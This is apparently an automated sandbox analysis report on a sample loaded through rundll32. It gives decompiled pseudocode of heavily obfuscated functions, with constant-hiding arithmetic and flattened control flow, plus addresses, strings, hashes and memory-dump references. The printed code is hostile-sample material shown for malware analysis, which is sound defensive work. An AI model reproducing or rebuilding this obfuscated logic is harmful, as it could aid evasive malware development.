				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x363dfc; // 0x0
						_t374 = E0034CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E00347FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x363dfc; // 0x0
									_t384 = E0034CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E00358519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}

0x00345e67
0x00345e71
0x00345e72
0x00345e79
0x00345e7b
0x00345e7c
0x00345e7d
0x00345e82
0x00345e8d
0x00345e90
0x00345e94
0x00345e9b
0x00345ea0
0x00345ea8
0x00345eb6
0x00345ebb
0x00345ec5
0x00345eca
0x00345ed0
0x00345ed8
0x00345ee0
0x00345ee5
0x00345eea
0x00345ef2
0x00345efd
0x00345f08
0x00345f13
0x00345f1b
0x00345f23
0x00345f2b
0x00345f33
0x00345f3b
0x00345f43
0x00345f4b
0x00345f53
0x00345f57
0x00345f5f
0x00345f67
0x00345f70
0x00345f73
0x00345f77
0x00345f7f
0x00345f8c
0x00345f95
0x00345f99
0x00345f9e
0x00345fa6
0x00345fae
0x00345fb6
0x00345fbe
0x00345fc6
0x00345fd1
0x00345fd9
0x00345fe4
0x00345fec
0x00345ff6
0x00345ffa
0x00346002
0x0034600a
0x00346012
0x00346017
0x0034601c
0x00346024
0x00346035
0x00346038
0x0034603c
0x00346044
0x0034604c
0x00346054
0x0034605c
0x00346064
0x00346069
0x00346071
0x00346079
0x00346081
0x00346091
0x0034609a
0x0034609d
0x003460a1
0x003460a9
0x003460b1
0x003460b9
0x003460be
0x003460c6
0x003460ce
0x003460d6
0x003460e2
0x003460e6
0x003460ee
0x003460f6
0x003460fe
0x00346106
0x0034610e
0x00346116
0x0034611e
0x00346126
0x0034612e
0x00346136
0x0034613b
0x00346148
0x0034614b
0x0034614f
0x00346157
0x00346167
0x0034616b
0x00346173
0x0034617b
0x00346183
0x00346188
0x00346190
0x00346194
0x0034619c
0x003461a9
0x003461aa
0x003461ae
0x003461b6
0x003461be
0x003461c6
0x003461ce
0x003461dc
0x003461e8
0x003461f0
0x003461fa
0x003461ff
0x00346207
0x0034620f
0x00346214
0x0034621c
0x00346224
0x00346232
0x00346237
0x0034623d
0x00346246
0x0034624b
0x00346251
0x00346259
0x00346261
0x00346265
0x0034626a
0x00346272
0x00346284
0x00346289
0x00346292
0x0034629d
0x003462a5
0x003462a9
0x003462ae
0x003462b6
0x003462be
0x003462c6
0x003462ce
0x003462d6
0x003462de
0x003462f0
0x003462f8
0x003462ff
0x0034630a
0x00346312
0x0034631a
0x0034631f
0x00346327
0x00346335
0x00346418
0x0034647f
0x00346484
0x0034648b
0x003464c8
0x003464ca
0x003464d2
0x0034648d
0x0034648d
0x00000000
0x0034648d
0x0034633b
0x00346341
0x0034640e
0x00000000
0x00346347
0x0034634d
0x003463ec
0x003463ed
0x003463ee
0x003463f3
0x003463fe
0x00346404
0x00000000
0x00346404
0x00346353
0x00346359
0x003464b1
0x003464b7
0x00000000
0x00000000
0x003464bd
0x0034635f
0x0034635f
0x003463bd
0x003463c2
0x003463c9
0x003463cf
0x00000000
0x003463cf
0x003463c9
0x00346359
0x0034634d
0x00346341
0x003464e1
0x003464e1
0x003464a6
0x003464ac
0x00000000

Strings

3n, xrefs: 0034617B
fxZn, xrefs: 003462CE
`%8, xrefs: 0034640E
3, xrefs: 003460BE
`%8, xrefs: 00346353
TNz7, xrefs: 00346002
6B, xrefs: 00346079
U, xrefs: 003461C6
~&t, xrefs: 00346054

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
API String ID: 0-1604698900
Opcode ID: 63136884e266440bcb08a2fa40d30f1959aaad76409c8b1730c1d51b21047546
Instruction ID: 237dd86ed12211082285c60b3e8551fb31099cb109d40fa62fe3a5ec9ee04648
Opcode Fuzzy Hash: 63136884e266440bcb08a2fa40d30f1959aaad76409c8b1730c1d51b21047546
Instruction Fuzzy Hash: C6F100714087809FD365CF66D58AA4BFBF1FB85B48F10891DF2968A260D7B29949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 100453D0
GetVersion.KERNEL32 ref: 100453DB
GetVersion.KERNEL32 ref: 100453E3
GetVersion.KERNEL32 ref: 100453E9
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 100453F6

Strings

MSWHEEL_ROLLMSG, xrefs: 100453F1

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D

Uniqueness

Uniqueness Score: -1.00%

Function 0035CB5B Relevance: 10.3, Strings: 8, Instructions: 335
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E0035CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E003520B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E0035DCF7(_v1596, 0x3410f0, __eflags);
							E0035176B( &_v1560, __eflags);
							_t382 =  *0x363e10; // 0x0
							_t385 =  *0x363e10; // 0x0
							E0035E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E0034A8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E003546BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E0034AB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E0035DCF7(_v1624, 0x341020, __eflags);
					E0035176B( &_v1560, __eflags);
					_t399 =  *0x363e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E00351652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E0034A8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}

0x0035cb65
0x0035cb6c
0x0035cb6e
0x0035cb75
0x0035cb7c
0x0035cb7d
0x0035cb7e
0x0035cb83
0x0035cb8e
0x0035cb91
0x0035cb9a
0x0035cba1
0x0035cba6
0x0035cbb1
0x0035cbbc
0x0035cbc7
0x0035cbd5
0x0035cbd8
0x0035cbdc
0x0035cbe4
0x0035cbec
0x0035cbf4
0x0035cbfc
0x0035cc04
0x0035cc0c
0x0035cc11
0x0035cc19
0x0035cc21
0x0035cc29
0x0035cc31
0x0035cc36
0x0035cc3e
0x0035cc46
0x0035cc4e
0x0035cc56
0x0035cc5e
0x0035cc66
0x0035cc6e
0x0035cc76
0x0035cc7e
0x0035cc86
0x0035cc93
0x0035cc97
0x0035cc9f
0x0035cca7
0x0035ccaf
0x0035ccb7
0x0035ccbf
0x0035ccc7
0x0035ccd4
0x0035ccd8
0x0035cce0
0x0035cce8
0x0035ccf0
0x0035ccfb
0x0035cd06
0x0035cd11
0x0035cd19
0x0035cd23
0x0035cd27
0x0035cd2f
0x0035cd37
0x0035cd44
0x0035cd48
0x0035cd50
0x0035cd58
0x0035cd60
0x0035cd68
0x0035cd75
0x0035cd7b
0x0035cd83
0x0035cd8b
0x0035cd93
0x0035cd9b
0x0035cda0
0x0035cda8
0x0035cdb0
0x0035cdb5
0x0035cdbd
0x0035cdc5
0x0035cdcd
0x0035cdd5
0x0035cde1
0x0035cde4
0x0035cde8
0x0035cded
0x0035cdf5
0x0035ce02
0x0035ce06
0x0035ce0e
0x0035ce16
0x0035ce1e
0x0035ce29
0x0035ce34
0x0035ce3f
0x0035ce47
0x0035ce54
0x0035ce58
0x0035ce60
0x0035ce68
0x0035ce70
0x0035ce7a
0x0035ce7d
0x0035ce81
0x0035ce89
0x0035ce91
0x0035ce99
0x0035cea1
0x0035cea5
0x0035ceaa
0x0035ceb2
0x0035ceba
0x0035cec2
0x0035ceca
0x0035cecf
0x0035ced7
0x0035cee2
0x0035ceed
0x0035cef8
0x0035cf00
0x0035cf09
0x0035cf0e
0x0035cf14
0x0035cf1c
0x0035cf24
0x0035cf29
0x0035cf35
0x0035cf38
0x0035cf3c
0x0035cf44
0x0035cf4c
0x0035cf51
0x0035cf5b
0x0035cf65
0x0035cf72
0x0035cf7a
0x0035cf7f
0x0035cf87
0x0035cf8f
0x0035cf97
0x0035cf9f
0x0035cfa7
0x0035cfaf
0x0035cfbd
0x0035cfc2
0x0035cfcd
0x0035cfd0
0x0035cfd4
0x0035cfdc
0x0035cfe7
0x0035cfef
0x0035cff6
0x0035d001
0x0035d014
0x0035d01b
0x0035d026
0x0035d02e
0x0035d036
0x0035d03e
0x0035d046
0x0035d056
0x0035d05e
0x0035d061
0x0035d065
0x0035d06d
0x0035d075
0x0035d07a
0x0035d082
0x0035d082
0x0035d090
0x0035d119
0x0035d122
0x0035d12d
0x0035d13b
0x0035d149
0x0035d16e
0x0035d19b
0x0035d1ad
0x0035d1b2
0x0035d1b5
0x00000000
0x0035d096
0x0035d09c
0x0035d0e8
0x0035d0f3
0x0035d0fa
0x0035d109
0x0035d10a
0x0035d10f
0x0035d112
0x00000000
0x0035d09e
0x0035d09e
0x0035d0a0
0x00000000
0x0035d0a6
0x0035d0a6
0x0035d0b1
0x0035d0b2
0x0035d0b3
0x0035d0b4
0x0035d0b5
0x0035d0ca
0x0035d0cb
0x0035d0d8
0x0035d0d8
0x0035d0a0
0x0035d09c
0x0035d0db
0x0035d0e7
0x0035d0e7
0x0035d1bc
0x0035d1c5
0x0035d1cd
0x0035d1db
0x0035d212
0x0035d21f
0x0035d223
0x0035d22e
0x0035d243
0x0035d248
0x0035d24b
0x0035d24d
0x0035d24d
0x0035d24d
0x00000000

Strings

C"", xrefs: 0035CE99
[4z, xrefs: 0035CF87
;@B, xrefs: 0035CBA6
[L , xrefs: 0035CC66
I, xrefs: 0035CC76
\WaD, xrefs: 0035D036
M, xrefs: 0035CDCD
O_2, xrefs: 0035CFE7

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
API String ID: 1514166925-553023378
Opcode ID: 72a6d6d1de21399e1db4244b354d065a75e53cce004a1c1906fdc79ee1dbd78d
Instruction ID: af7b03b30069676496549c3c0cfee02e21231653ac1ae7726d4687d49be9c935
Opcode Fuzzy Hash: 72a6d6d1de21399e1db4244b354d065a75e53cce004a1c1906fdc79ee1dbd78d
Instruction Fuzzy Hash: 41021EB15083819FD3A5CF25C98AA8BFBE1FBC4718F10891DF5D986260D7B1894ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 003470B3 Relevance: 10.3, Strings: 8, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003470B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x363dfc; // 0x0
							_t302 = E00355B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
